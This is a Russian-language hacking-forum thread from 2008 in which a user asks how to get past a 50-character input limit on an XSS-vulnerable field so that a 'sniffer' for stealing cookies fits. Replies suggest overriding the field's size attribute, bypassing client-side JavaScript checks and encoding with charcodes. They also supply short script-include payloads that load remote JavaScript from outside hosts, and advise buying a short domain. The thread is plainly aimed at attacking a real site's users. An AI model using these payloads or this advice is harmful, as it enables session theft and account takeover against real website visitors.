Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Обход ограничений символов (xss) ? |
21.07.2008, 19:03
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Обход ограничений символов (xss) ?
Вот есть поле, там работает алерт, но ввод символов ограничен...как можно обойти данное ограничение ? (для снифера)
|
|
|
21.07.2008, 19:12
|
|
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037
Репутация:
73
|
|
возможно ограничение реализовано путём выставления значения size, попробуй сохранить страницу, переопредели это значеие для уязвимого поля на более длинное, пропишу полнуй путь к скрипту и попробуй выполнить. Второй вариант, то что возможно проверка реализована только ява скриптом, нада либо найти это место и вырезать либо отключить выполнение жабаскрипта, но тогда ты сам не увидишь результат выполнения  . Но это всё оочень мало вероятно и скорей всего проверка и на клиенте и на серванте |
|
|
|
21.07.2008, 19:30
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
но ввод символов ограничен
И что мы под этим должны понимать? ограничение по размеру или фильтрация? а может поле заколдовано и на хакеров, пытаюшихся его заxssить наводится порча?
|
|
|
|
21.07.2008, 19:42
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
юзай кодировку в чарс
|
|
|
|
21.07.2008, 19:43
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Код:
<script src="http://www.ya.ru/1.js"></script>
- короче ничего не знаю 
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
21.07.2008, 19:48
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
инклудом
<SCRIPT SRC=http://xek.site/xss.js></SCRIPT>
|
|
|
|
21.07.2008, 20:01
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
в поле можно водить только 50 символов.
инклуд, самое оно но нужен короткий домен( |
|
|
|
21.07.2008, 20:17
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Купи, трёхбуквенники ещё остались.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
